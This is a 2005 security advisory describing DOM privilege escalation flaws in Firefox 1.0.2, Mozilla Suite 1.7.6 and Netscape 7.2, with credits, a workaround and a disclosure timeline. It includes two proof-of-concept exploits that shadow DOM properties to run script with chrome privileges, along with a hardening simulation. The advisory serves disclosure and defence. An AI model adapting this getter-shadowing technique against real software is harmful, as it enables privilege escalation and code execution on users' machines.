Multiple privilege escalation vulnerabilities in the DOM were found in Mozilla-based web browsers (Mozilla Suite, Netscape and Firefox) that give attackers the ability to install malicious code or steal data, requiring only that the user perform commonplace actions such as clicking on a link or opening the context menu.
Credit:
The information has been provided by Juha-Matti Laurio.
The original article can be found at: http://www.networksecurity.fi/advisories/netscape-dom.txt
For more information about the bug please visit the following site: http://www.mozilla.org/security/announce/mfsa2005-41.html
Vulnerable Systems:
* Firefox version 1.0.2 and prior
* Mozilla Suite version 1.7.6 and prior
* Netscape version 7.2
Immune Systems:
* Firefox version 1.0.3
* Mozilla Suite version 1.7.7
By using eval() and other JavaScript functions, scripts in a web page can override properties and methods of DOM nodes and shadow the native values, unless privileged code takes steps to get the true underlying values. The common cause in each case was privileged UI code ("chrome") being overly trusting of DOM nodes from the content window.
Exploit 1:
<body style="width:100%;height:100%;">
Click on document.
<script>
// it needs chrome privilege to get |Components.stack|
var code = "alert('Exploit!\\n\\n' + Components.stack);'body';";
document.body.__defineGetter__("localName", function() {
var s = new String('BODY');
s.toLowerCase = new Script(code);
return s;
});
</script>
</body>
Exploit 2:
<script>
// it needs chrome privilege to get |Components.stack|
var code = "alert('Exploit!\\n\\n' + Components.stack);'';";
document.createElement("link").__proto__
.__defineGetter__("rel", new Script(code));
</script>
<link rel="test"/>
Target of attack:

Firefox 1.0.2 - livemarkOnLinkAdded() in browser.js:
    var erel = event.target.rel;

If pref "browser.chrome.site_icons" is true:

Firefox 1.0.2 - onLinkAdded() in tabbrowser.xml:
    if (!event.target.rel.match((/(?:^|\s)icon(?:\s|$)/i)))
        return;

Mozilla 1.7.6 - onLinkAdded() in tabbrowser.xml:
    if (!event.originalTarget.rel.match((/(?:^|\s)icon(?:\s|$)/i)))
        return;
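To make the shadowing mechanism concrete from the defender's side, the following added example (not from the advisory or from Mozilla's code) simulates the onLinkAdded() check above in plain Node.js. FakeLinkElement stands in for a DOM <link> node, a plain function replaces Mozilla's Script constructor, and the hardened check reads the value through an accessor captured before any content script ran, which stands in for whatever native-value access the browser provides.

```javascript
// Simulated DOM node: the "native" rel value lives in a private slot that
// only the prototype getter reads. (Constructed stand-in, not a real DOM.)
class FakeLinkElement {
  constructor(rel) { this._nativeRel = rel; }
  get rel() { return this._nativeRel; }
}

// Privileged code captures pristine accessors before content runs, so later
// tampering with the instance, the prototype, or String.prototype cannot
// redirect these calls.
const nativeRelGetter = Object.getOwnPropertyDescriptor(FakeLinkElement.prototype, 'rel').get;
const nativeMatch = String.prototype.match;
const ICON_REL = /(?:^|\s)icon(?:\s|$)/i;

// Vulnerable pattern from the advisory: both `rel` and its `match` method are
// looked up on objects the content window controls.
function isIconLinkVulnerable(node) {
  return Boolean(node.rel.match(ICON_REL));
}

// Hardened: fetch the underlying value via the captured getter, insist on a
// primitive string, and call the captured String.prototype.match.
function isIconLinkHardened(node) {
  const rel = nativeRelGetter.call(node);
  if (typeof rel !== 'string') return false;
  return nativeMatch.call(rel, ICON_REL) !== null;
}

// Content-side tampering, mirroring Exploit 2: shadow `rel` with a getter that
// returns a String object whose `match` is content-supplied code. The trace
// records whether that content code executed inside the privileged check.
function simulateContentTampering(node) {
  const trace = [];
  node.__defineGetter__('rel', function () {
    const s = new String('icon');
    s.match = function () { trace.push('content code ran inside chrome check'); return ['icon']; };
    return s;
  });
  return trace;
}

function demo() {
  const node = new FakeLinkElement('stylesheet'); // not an icon link
  const trace = simulateContentTampering(node);
  const vuln = isIconLinkVulnerable(node);  // true: attacker's match() ran
  const hard = isIconLinkHardened(node);    // false: native value used
  return { vuln, hard, trace };
}
```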
Workaround:
Update to the latest Firefox/Mozilla suite web browser or disable Javascript support.
CVE Information:
Disclosure Timeline:
23-04-2005 - Vulnerability discovered
28-04-2005 - Detailed research
28-04-2005 - Vendor informed
28-04-2005 - Security companies informed
29-04-2005 - More security companies and CERT-FI informed
29-04-2005 - Advisory published